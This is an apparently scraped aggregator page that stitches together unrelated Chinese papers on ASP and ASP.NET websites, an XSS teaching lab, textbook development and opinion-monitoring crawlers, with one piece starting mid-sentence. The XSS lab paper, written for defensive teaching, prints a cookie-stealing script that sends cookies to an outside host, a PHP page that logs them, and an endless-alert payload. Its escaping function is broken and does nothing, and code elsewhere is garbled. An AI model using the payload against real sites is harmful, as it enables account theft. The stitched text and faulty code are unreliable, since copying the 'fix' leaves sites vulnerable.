本次利用毕业设计的机会,为自己工作的单位设计了网页。网页使用ASP技术开发,具有良好的交互性能,具备强大的后台管理功能。新闻发布、信息检索、互动交流等主要模块设计做到了与单位职能职责的紧密结合,达到了预期设计目标。网页经单位局域网多次测试,在WindowsXP操作系统,IIS5.1的服务器环境上正常运行。
此次网页制作,通过大量阅读书籍和求助互联网,使我初步掌握了网页设计制作的一般过程、ASP简单设计应用、CSS和表单布局常识、ACCESS数据库设计技能。特别是在ASP编程阶段,通过无数次解决测试过程中排查出的问题,我不仅回顾和应用了以前学习过的理念知识,还掌握了许多新的知识和技巧,获益良多。但由于时间仓促,受一些技术和设备所限,网页在美工、需求分析、网页安全等方面存在诸多不足之处,有待后期运行中进一步改进和完善。
参考文献
1. 《Dreamweaver CS3 入门 提高 精通》,薛凯,康亚雄编著,机械工业出版社 2008
2. 《Photoshop CS3 平面设计标准教程》,李建宏,雷波编著,机械工业出版社 2008
3. 《ASP网页数据库短训教程》,刘瑞新,汪远征编著,机械工业出版社 2005
4. 《Flash CS3动画制作》,华信卓越编著,电子工业出版社 2008
5. 《网页设计三合一》,甘登岱编著,清华大学出版社 2009
6. 《网页设计与网站建》,邱云飞,温国峰编著,清华大学出版社 2009
7. 《Access2007数据库应用与开发》,杨继萍,孙岩,梁文新编著,清华大学出版社 2008
8. 《网页制作从入门到精通》,谭贞军,刘斌编著,清华大学出版社 2008
9. nbagri.gov.cn/index.jsp(宁波农村经济综合信息网)
10. 68design.net/(网页设计师联盟)
11. wznb.gov.cn/(温州市委农办)
12. bjnw.gov.cn/(北京市农委)
[关键词]电影评介 ASP.NET SQL Server 2000
随着电影在人们生活中的影响不断的提高,电影的精彩与否也成了人们关心的话题,一部好看的电影往往能使人回味无穷,于是观众在观看或下载电影之前总是希望的到关于影片的评论,虽然现在电视上有一些关于新片的介绍,但是许多观众往往因为某些原因看不到,网络的普及使得信息传播变的非常容易,电影评介系统也就随之出现,观众可以从中获得自己想要的信息。
一、系统总体构架
1.总体功能和运行流程
总体架构上,系统功能主要由以下五个部分组成:
(1)提交影评 在浏览书评网页时,可以针对自己感兴趣的电影发表评论。
(2)再发评论 针对已经存在的影评记录,发表自己的意见和观点。
(3)检索浏览 提供一个本网站的搜索入口,根据影片名称等查看有关影评信息。
(4)用户注册 登记用户的基本信息,必须是已经注册的用户才能发表评论。
(5)系统管理 管理注册用户基本信息,维护影评数据库文档,删除问题影评记录等。
系统运行的基本流程为:首先注册――验证身份后登录――查询浏览网页发表评论,如果是管理者,则登录系统管理网页。
2.运行环境和平台
整个运行环境和软件平台基于Windo-WS。Web服务器由Windows 2000或以后的各个版及IIS5.0及以后版本构建,需要安装.NET公共语言运行包(CLR)1.0及以上版本。当然,实际安装运行时必须部署Web应用程序及其配置文件Web.config。
二、数据库架构
SQL为结构化查询语言,是一个专为分布式客户机服务器计算环境而设计的关系型数据库管理系统,它继承了高性能、高可靠性和可伸缩性的优势。本方案的影评系统主要有三个表,用户表Users,电影信息表Films和与之相对应的影评信息表Record,还包括如国家或地区,影片类型等基本表。
1.用户表结构
记录注册用户的基本信息,包括用户名,密码,邮箱,出生日期,登陆权限(注册用户或管理员),密码保护资料以及注册时间等信息。例如:
用户名:iandan密码:123456邮箱:2563@163.com出生日期:1981.6.8登陆权限:普通用户密码保护资料问题:你是哪里人? 答案:浙江人注册时间为当前系统时间。
其中用户名必须是唯一的,在用户登陆时根据数据库中登陆权限的不同登陆不同的页面,管理员可以维护数据库中的数据。
2.电影信息表
记录所有影片的信息,影片必须全面(包括国内外各种形式的电影),这就要求管理员有一定的信息收集途径。信息包括影片ID(唯一标志),影片名称,出产国家或地区,类型,导演,主要演员,出产时间,片长,影片简介以及电影海报等。
3.影评信息表
用以记录用户对影片的评介,包括ID,评介内容和评介时间。其中ID和电影信息表中的ID想关联,用户可以在影片简介的下方看到按照评论的时间顺序排列的相关评论。
三、基于ASP.NET技术要点及实现
ASP.NET是Microsoft公司.NET战略的核心组成之一,与ASP 3.0技术比较,在面向对象设计、网页安全性管理、组件化程序设计、XML标准族支持和Web Services应用等方面有非常显著的改进或革新。特别是,在支持SQL、XML等应用方面,NET提供的命名空间分别为System.Xml、System.Data.SqIC…e,充分满足了基于SQL的设计和应用需求。本文的技术要点涉及到网页安全、数据库内容读写等。
1,网页安全性
在Web服务器上保护网页等资源的方法有多种,比较而言,ASP.NET提供的窗体验证方式异常简单和有效的,主要由如下两个步骤实现[1]:(1)当用户输入帐号和密码后,将会传输到服务器进行验证,如果匹配用户可以浏览网页并发表评论,如果错误则将跳转到Login,aspx页面,游客只能浏览网页而不能在此发表评论。其中、Login.aspx为系统的登录页面。(2)验证读者身份后,创建非持久的Cookie验证票据。其C#代码为:formsAuthentication.SetAuthCookie((string)Session"Name"),false);其中,Name为当前登录的用户名称,该名称是唯一的。将配置文件Web.config部署在应用程序同文件夹中。如果操作者没有正确登录,即没有Cookie授权票据,就发表评论,那么将直接链接到登陆页(Logln.aspx),强制要求访问者先验证身份。
2.数据库内容读写
ASP.NET提供了一种叫DataSet的对象,提供数据缓存服务,与数据源并不相连,在对数据进行操作之前,在DataSet中先验证数据的合理性,然后再使用DataAdapter对象操作数据源中的数据。使用也比较简单,比如要将影评信息表中的数据显示出来,可以使用DataGrid控件,当SqlConnection与数据库连接之后,创建SqIDataAdapter对象,SqlDataAdapter mycom=newSqIDataAdapter(“Sdect*from Record”,数据连接);创建DataSet对象,DataSetds:newDataSet():将查询结果填充到DataSet对象中mycom.Fill(dS,“Record”);最后将DataGrid的数据源设定为DataSet对象,实现数据绑定。
用户对影片进行评论的过程和显示的代码稍微有点区别,但也很简单,这里就不做更的分析了。
3.影评网页
用户首先打开的是一个包含各类电影和登陆框的页面,其中每一类都会显示最近更新的电影名称,用户也可以查询其他未显示出来的电影,当用户点击电影名称后,将会显示包含该影片的介绍和评论的页面,登陆的用户可以在此谈论和评价。未登陆的用户如果点击了评论,则会跳转到登陆页面要求用户登陆或注册新用户。
(广东外语艺术职业学院,广东 广州 510640)
【摘 要】高职院校的网络安全类课程教学中,需要学生既具有扎实的基础理论知识,又要求在教学中给学生提供一个模拟或者真实的操作环境帮助学生全面的掌握网络安全知识。如何防范跨站脚本攻击是当前网络安全工作中的一个重要课题,本文结合了日常教学的经验,在详细分析跨站脚本攻击原理的基础上,在php+mysql环境上搭建出一个真实的实验环境,帮助学习者深刻理解跨站脚本攻击的相关知识,并学会如何进行有效防范。
关键词 跨站脚本攻击; 网络安全; 实验平台
【Abstract】The students in vocational college are required to have enough knowledge about the principle of network security, and an experimental platform is also needed to help students lean network security. Cross Site Script(XSS) attack and defense is an important subject in network security field. An experimental platform is developed to help learner understand about XSS attack and defense, and the principle of XSS attack and defense is also analyzed. The platform is developed using php+mysql tools. This article is based on the author’s regular teaching experience.
【Key words】Cross site script attack; Network security; Experimental platform
跨站脚本攻击在各种网络安全漏洞中,一直被OWASP(Open Web Application Security Project) 组织评为十大安全漏洞中的第二威胁漏洞。2011年,国内最热门的信息平台“新浪微博”爆发跨站脚本攻击,仅持续16分钟,感染的用户就达33000个,可见其危害之大。
高职院校的《网络安全与防范》课程也把跨站脚本攻击作为一个重点的教学内容。为了让学生充分掌握跨站脚本攻击的防范方法,就必须透彻的了解跨站脚本攻击的原理和具体的实施过程。
我们开展了一项课题,旨在搭建一个网络攻防的应用平台,帮助学习者更深刻的理解各种网络攻防的原理和了解其实施的步骤,以采取更高效的防范措施,来杜绝网络攻击的产生。跨站脚本攻击就是其中的一项任务。
本文中,我们会对跨站脚本攻击进行详细的分析,并结合搭建的网络平台重建攻击过程,并提出防范方法。
跨站脚本攻击是由于网站的后台系统对用户的输入过滤不严而产生的。攻击者利用这一点把恶意代码加入到网站的后台系统中(通常是网页之中),当用户浏览这些网页时,那些隐含在正常网页中的恶意代码就会在用户的机器中得以执行,从而达到各种攻击用户电脑的目的。
为了理解跨站脚本攻击,有必要先了解用户访问一个没有恶意代码的简单网页的过程。访问如图 1所示的一个网页,用wireshark工具进行网络数据的捕获。
总共捕获到两个数据包,一个是浏览器发送给网站的请求数据包,其内容如图 2:
在请求数据包中,比较重要的一个字段是cookie字段,其具体内容记录了用户平时登录各种网站的账号和密码信息。跨站脚本攻击往往会通过这个字段获取到用户的账号等重要信息。
网站回送给浏览器的响应数据包如图 3:
在响应数据包中,除了一些头信息外,还附带上了网页的内容。可见,一个基本的网页访问过程就是由一个请求数据包和响应数据包组成的。
接下来,在我们搭建的实验平台上,对一个网站进行跨站脚本攻击,以实现一个不断弹出的窗口,迫使正常的网页浏览无法继续下去。在一个存在有漏洞的商品评价网页中,通过对商品添加评价进行攻击。如图 4:
在评论内容里面,写下如下的代码:
<script>while(true) alert(/You have been XSS attacked!/) </script>,
发表评论后,当其他用户登录网站,通过点击“查看该商品评论”查看评论时,就会出现如图 5所示的情况:
并且无论点击多少次“确定”按钮,都无法关闭此弹出窗口,表明此用户已经受到了跨站脚本攻击。打开由网站传送回来的网页源代码,可以发现这样一句代码:“<script>while(true) alert(/You have been XSS attacked!/) </script>”,这段代码已经被插入到网页中,当浏览器解析到这一段代码时,因为“<script>”标签的原因,标签对里面的内容会被解释执行,而不是作为对商品的评论原封不动的显示在页面上。通过查看网站后台数据库,发现如图 6所示的语句已经被写入了数据库:
当其他用户查看此商品的评论时,此条记录被读出,并插入到网页中,从而形成了跨站脚本攻击。
另外一个跨站脚本攻击的案例是盗取用户的登录账号和密码。
用户“qy1”在如图 7所示的网页中进行登录后:
在用户的机器上会保留一个cookie,里面记录了用户登录时输入的账号和密码。可以通过在用户的浏览器的地址栏输入语句“javascript:alert(document.cookie)”来显示出账号和密码,如图 8所示:
可见用户的账号和密码都保存在了用户的计算机中。通过跨站脚本攻击可以在攻击者的机器上获得用户的账号和密码。
攻击者a在某一个商品的评论中发表如图 9所示的内容:
其中,评论内容中输入的是: “<script>var ck=document.cookie;var url=\’kaikaixinxin.net/qlunwen1216/jieshoucookie.php?zhanghao=\’+ck;var daima=\´<iframe width=0 height=0 src=\"\’+url+\’\"></iframe>\’;document.write(daima);</script>”。
当用户“qy1”登录网站查看这一个评论时,其账号和密码就会发送到攻击者a所指定的机器上,并存储在“cookie.txt”文件中,其中的内容如图 10:
由此攻击者就利用跨站脚本攻击获取到了被攻击者的账号和密码等重要信息。
分析此次跨站脚本攻击,攻击者在商品评论里面并没有写入评论性的语句,而是写入了一段javascript代码,这段代码并没有经过过滤就被写到了网站的后台数据库中,如图 11:
当受攻击者浏览这个商品的评论时,这段代码没有经过任何过滤就被传送给了浏览器,而浏览器当解析到<script></script>所包括的语句时,会认为这是一段javascript语句,会执行语句中的内容。而这段代码的作用就是读取被攻击者机器上所存储的cookie信息,并且把此信息发送给攻击者所指定的网站的指定接收页面。我们再来看,这个接收页面的内容如下:
<?php
$cookie=$_GET[´zhanghao´];
$cookierec=fopen("cookie.txt","a");
fwrite($cookierec,$cookie."\n");
fclose($cookierec);
?>
其作用就是接收被攻击者发送过来的账号信息,并把它存储在文件“cookie.txt”里面。
被攻击者的机器在不知不觉中向攻击者指定的机器发送了数据包,其内容如图 12:
数据包中的GET语句包括了用户的账号等重要信息。
到此为止,一个详细的跨站脚本攻击过程就已经详细的展现出来。如何防止此种跨站脚本攻击呢。通过分析以上攻击过程,发现实现此类攻击,要具备以下条件:
(1)网站存在供用户输入数据的页面,类似留言板,商品评论,搜索框等。
(2)用户浏览了被攻击者恶意修改过的网页。
(3)用户的机器允许执行这些恶意代码。
(4)网站没有对用户的输入内容进行有效的过滤,即过滤掉那些攻击性的代码,并且在输出用户的评论或者搜索内容时也没有进行过滤。
对于以上的第一点,由于现在绝大多数网页都会有和用户交互的需要,所以给用户输入信息的功能,不能取消。
对于第二点,用户可以提高警惕,对于一些非法网站,尽量不要去访问。
对于第三点,用户可以禁止浏览器的活动脚本的执行,可以如图 13设置:
对于第四点,要求网站开发人员对用户的输入信息进行过滤,过滤掉恶意的代码。或者在输出时进行过滤,过滤掉恶意代码。
例如,可以建立一个如下的函数:
function unhtml($content){
$content=str_replace("&","&",$content);
$content=str_replace("<","<",$content);
$content=str_replace(">",">",$content);
$content=str_replace(" ," ",$content);
$content=str_replace(chr(13),"<br>",$content);
$content=str_replace("\\","\\\\",$content);
$content=str_replace(chr(34),""",$content);
return $content;
}
利用此函数把”<” ,”>”, “&”等字符转化为<, >, &等字符。这样浏览器在输出时,遇到<, >, &等字符时,就会在网页上显示”<” ,”>”, “&”等字符,而不会把这些字符对中所包含的内容当作可运行的代码进行执行了。
在实验平台的网站后台页面代码中加入unhtml函数,例如在显示商品评论的网页showpl.php中加入如下代码
<?php echo unhtml($info1[content]);?>
成功对商品评论中的输出内容进行了过滤,避免了跨站脚本攻击,用户看到的输出结果如图 14:
结论:
为了让学习者理解如何防范跨站脚本攻击,搭建了一个基于php+mysql的实验平台,在对跨站脚本攻击进行了原理上的详诉后,对攻击中的每个步骤进行了模拟,每一步的模拟都是一个真实攻击的再现。最后,讲解如何防范跨站脚本攻击,对于后台防范代码做了详解,演示了防范后的效果。我们搭建的实验环境让学习者不再局限于对跨站脚本攻击原理上的了解,而是有了一个实操的环境,极大的提高了学习者的学习兴趣,增加了学习效率。基于我们搭建的实验平台,将来还可以开展更多的实验。
参考文献
[1]赵彬.黑客攻防Web安全实战详解[M].北京:中国铁道出版社,2014.
[2]肖遥.大中型为了入侵要案直击与防御[M].北京:电子工业出版社,2011.
>> 职业院校校本教材建设 浅谈职业院校的教材管理与建设工作 职业院校校本教材开发小议 关于中等职业院校钢琴教材与教法 浅谈职业院校少数民族预科班《flas制作》课程校本教材的改革思路 高职院校图形类专业《网页设计与制作》课程建设改革的探讨 职业院校《公路施工安全》课程开发与建设 职业院校网络课程的建设与应用 职业院校专业实训室建设与管理研究 职业院校模具专业建设与发展的思考 浅析高等职业院校课程开发与建设 职业院校生态文明建设的研究与探索 职业院校学生社团建设与创新 职业院校智慧校园建设的探讨与实践 高等职业院校钢琴教材设计与编写探析 医学职业院校基于Moodle的网络教学平台搭建与课程资源设计初探 浅论职业院校专业课程校本教材的建设 职业院校模具设计与制造专业建设研究 职业院校《动画制作》技能大赛试题库建设的实践研究 新时期职业院校开展校本行动研究的意义与对策 常见问题解答 当前所在位置:l),页面元素完整;(3)应用表格或者div、css布局页面;(4)在页面中插入文字,并用css美化文字大小、字体、颜色等效果;(5)在页面中添加超级链接,并用css美化超级链接;(6)建立模板,并制作其他页面;(7)至少完成8个及以上页面,页面标题栏、状态栏、版权等信息齐全;(8)页面中超级链接如没有链接页面以空链接(#)代替。
学生根据以上设计要求,结合所学内容,从旅游类网站、时尚类网站、教育类网站、门户类网站等几个大类中选择某一项进行设计制作。教师将根据学生完成情况的复杂程度和实际效果给予评价,锻炼了学生的实践动手能力,增强了自信心和学习兴趣。
三、教学素材的选用方法
教学素材是以完成课堂教学任务为目的,以教师引导学生开展课堂活动的形式呈现的教学材料。
1.合理性。以个人网站设计来说,文本的制作上讲求清晰、明了、突显个性化,Logo和导航的字体、字号设计可以依个人的喜好采取不规则式,选择跳跃感强的色彩。在图像的选取上也是以色彩丰富、形状多样的图案为主。
2.整体性。选用的教学素材要能够自然、贴切地把各个知识点整合在一起,教学素材要服务于教学目标,要突出教学的重点。电子商务类网站以从事电子商务为主,对安全、稳定等性能要求较高,比较考验网站中运行的程序。在知识点上以表格嵌套、模版运用、脚本语言和行为语句为重点进行讲解。
3.现实性和针对性。课堂教学中选取的素材要符合学生的认知水平和实际生活,教师可以从具体教学对象的特殊性出发,根据教学对象因人、因地、因时选材,为他们“量身定制”针对性较强的教学素材,如在教授电子商务专业学生时,素材的选取多以电子商务平台或某一个人网店为主,以便引导学生从自己熟悉的教学素材中直观体验获取知识、提高能力的喜悦。
四、教学模式在教材中的运用
在《网页设计与制作》校本教材的开发上主要采用“基于过程的项目式教学法”。即“在引导学习者融入有意义的项目完成的过程之中,让学习者积极地探究与发现,自主地进行知识的整合与建构,以现实的、学生生成的新知识和提高的完成项目任务的能力为主要成就目标,项目完成的过程也是学习者学习活动进行的过程”。为此,以项目作品开发为主线,把教材中的范例网站分解成若干个子任务,将课程标准中的图像处理、动画制作、音视频处理、网页页面设计制作、站点维护等多方面的知识点融入其中,在整个课堂教学实施中,教师根据网站设计开发的实际工作顺序安排,以作品演示的方式从头至尾带领学生操作,让其感受网站从无到有一步步制作的全过程,有助于提高学生的学习兴趣,培养其创新设计能力。
五、结语
笔者认为,一本好的教材应具备合理的章节顺序,精练、准确的理论描述,必要的理论实现步骤和贴合学生实际、具有一定扩展性的实例,以及最后的综合性练习章节,并且在教材中最好还要加上行业规范和相关的职业岗位及要求。这样,使用这些教材的学生才能更好地明确自己的学习目标和学习要求,将来才能适应社会的需要。
参考文献:
[1]雷秀芳.从一个别具匠心的教学设计谈教学素材选取与应用的有效性[EB/OL].西安爱知中学,2011-09.2012-05.
.
[2]郭锂,叶惠文.基于“双层项目驱动教学模式”的计算机基础课程立体教材开发与应用[J].中国大学教学,2012,(2).
[3]李巍.高校“网页设计与制作”教材建设初探[J].西昌学院学报,2012,(3).
关键词:舆情、风险监测、质量安全
1、引言 近年来,随着新媒体的迅猛发展, 我国网络舆情的影响日益巨大。自2008年以来, “三聚氰胺”, “一滴香”、“瘦肉精”事件以及近期出现的“摇摇车”、“电梯事故”等一系列质量安全问题的出现,都在社会中产生了巨大的负面影响,产品质量安全的网络舆情的数量和影响持续上升,对政府舆论应对能力提出新的挑战,加强产品质量安全网络舆情监控管理研究的现实需求十分迫切。
当前国内在国内质检数据较为封闭的环境下,与互联网的联动和应用也预示着质检行业在大数据时代中的一种尝试。
2、舆情检索技术 网络舆情监测系统是一项复杂而庞大工程,它涵盖了几乎所有的互联网领域的基本技术,但从系统的功能实现上看,舆情监测系统的关键技术是由数据采集和关键信息提取技术构成的。
2.1 数据采集 网络爬虫是当前主流网络搜索引擎使用的技术,也是舆情监测工具中处理网页获取、网页跟踪、网页分析、网页搜索、网页评级和结构/非结构化数据抽取以及后期更细粒度的数据挖掘等方方面面的主要工具。
网络爬虫的实现方式是通过访问网页中的超文本链接,自动抓取互联网内部的程序或者脚本。
2.2 通用型爬虫与主题性爬虫介绍 当前主流的网络爬虫技术主要分为通用型网络爬虫技术和主题性网络爬虫技术。通用型网络爬虫的主要目标是大量采集信息页面[1],有较高的网络覆盖率,但其盲目的抓取会下载大量的垃圾页面,浪费网络资源。
主题型爬虫以自定义的主题信息为出发点抓取信息,基于此假设:如果网页U与主题相关,并且页面V到网页U通过一个超链接进行连接,那么抓取页面V的主题相关度比从网页中随机抓取的页面相关度要高。[2] 与通用型爬虫不同之处在于主题型爬虫可专门面向某一特定主题进行搜索,对于质检行业所关注的产品、标准、项目有更好的适应性。
2.3 主题型爬虫的工作方式 主题型爬虫的运行过程大致为:
1. 将搜索到的页面和各种信息项放到一个信息集合项中;
2. 分析每个信息项,将其中的基本信息单元作为索引,并形成索引库。同时建立一个存储Web页面的metadata数据库。
3. Web浏览器将用户通过浏览器的查询请求通过HTTP协议传到搜索引擎,搜索引擎利用索引库找到相关文档并返回Web页面,或者将URL列表以及相应的摘要反馈给Web浏览器的用户查询界面。
4. 用户获得Web页面摘要信息或者信息项的列表,若想查看其中具体的内容,则点击标题访问,浏览器在matadata数据库的支持下通过HTTP协议从信息的原始位置取回Web页面或其他信息。
2.4 主题型爬虫的爬行策略 实现主题型爬虫最常用的策略是PageRank和HITS算法,其共同点是根据页面与主题的相似程度来确定主题的相关度,并根据主题的相关度来评估子网页的重要性。[3]
RageRank算法可以得出网页的重要程度,进而对其权威性进行评价。
HITS算法也是一种通过网页链接来评估网页重要性的算法。相较于PageRank算法,HITS算法在网页链接与用户需求主体的关联性上有所改进。
3 质量舆情系统架构设计研究 质量舆情系统统是一个分布式互联网数据搜集与挖掘系统,系统的模块分为6层:数据抓取、数据预处理、数据提取、数据索引、数据检索、API/Web service与平台展示。
3.1 数据预处理 预处理包括网页噪音去除和语义分析。
噪音去除:
对抓取到的数据进行噪音去除,包括网页周边广告和版权声明。对保留的有效内容,逐句做正负面判定,以及品牌、属性词条的露出标注。并将预处理后的信息入库保存。
语义分析:
1, 智能语义分析:基于基础的分词词典、正负面词典、15个领域的知识库和句法分析算法,可以自动的对网络信息进行实体、属性识别以及正负面判定,从而实现了海量信息下的口碑分类与危机识别。
2, 半结构化信息的自动提取:可以自动提取互联网网页中的有用信息,保存到结构化的数据库中实现方便的查询,如网络论坛中的分楼、帖子作者、时间、点击数、回复数等。
3, 海量文本的分类与聚类:可灵活的为各种分类体系训练相应的分类器,适应应用场景中多变的分类需求。基于LDA改进算法的聚类结果,可以充分挖掘语义层的关联,进行大规模的文本聚类,并进一步应用到互联网内容传播中的话题管理与新话题发现。
4, 内容关联性分析:基于FSP、卡方、Word2Vec等各种算法开发的内容关联性分析,适合各种不同应用场景中的关联发现需求,产品-属性、产品-竞品、产品-广告匹配,等等。
5,分词与领域内命名实体识别:常规自动发现互联网新词、领域内新词、以及领域内的命名实体识别,从而在应用中更为准确的定位目标实体。
3.2数据提取 提取出网页中内容的结构化数据并入库保存,供报告统计和前台查询时使用。结构化数据包括文章的作者、时间、发布站点、点击、回复、阅读、评论、点赞等。动态指标数据可以根据需求做定期更新。对于页面中的互动内容,如论坛的分楼回复、新闻下评论、可以做精细化提取为作者、时间、回复内容。互动内容需要根据站点做定制开发,目前覆盖热门100个论坛,以及4大门户的新闻评论。
3.3数据索引 为了提供快速的关键词检索,系统采用倒排表作为文本内容的索引。为提高效率,系统索引分为三级。当日内的数据放在一级索引里,本周数据放在二级索引里,本周前的数据放在三级索引里。每日抓取回的数据每小时都会更新到一级索引里。当抓取内容进入索引后,就可以提供对外的查询。
3.4数据检索 用户在平台上做监测关键词配置后,系统的数据检索模块会定期对后台的索引进行检索,筛选出来符合平台配置的文章,放到平台上提供展示和统计筛选。对于有特殊需求的客户,比如危机预警客户,可以定制平台数据更新频次和时间点,从而实现平台更频繁更新。
数据检索的过程既包括文本内容的检索,也包括对于内容的元数据的关联,比如,检索出论坛文章后,同时关联出文章的作者、时间、点击、回复等信息。
3.5 平台信息展示与API数据接口 系统通过Web 服务的方式,呈现监测对象的相关数据,并按照时间、站点、正负面、作者等维度进行数据筛选。并在数据基础上统计出热门话题、负面话题、热词云图等数据统计结果。
4 结束语 我国的质检行业面临的市场化的挑战,而当前质检行业对信息技术手段的利用离现代企业管理还有差距。舆情监测系统能够帮助质量监管部门获取当前市场上最关注的的质量问题。我国的质检行业面临的市场化的挑战,而当前质检行业对信息技术手段的利用离现代企业管理还有差距。舆情监测系统能够帮助质量监管部门获取当前市场上最关注的的质量问题。通过网络舆情监测系统,利用计算机网络技术的优势,系统、科学、高效的分析和预警质量信息,是质量监管部门维护社会稳定,保护企业形象的基础保障。但是对于怎样挖掘更深入的信息,怎样对挖掘的信息进行风险等级评价,依然需要深入研究。
参考文献 [1] 王桂梅.主题网络爬虫关键技术研究[D].哈尔滨工业大学,2009.
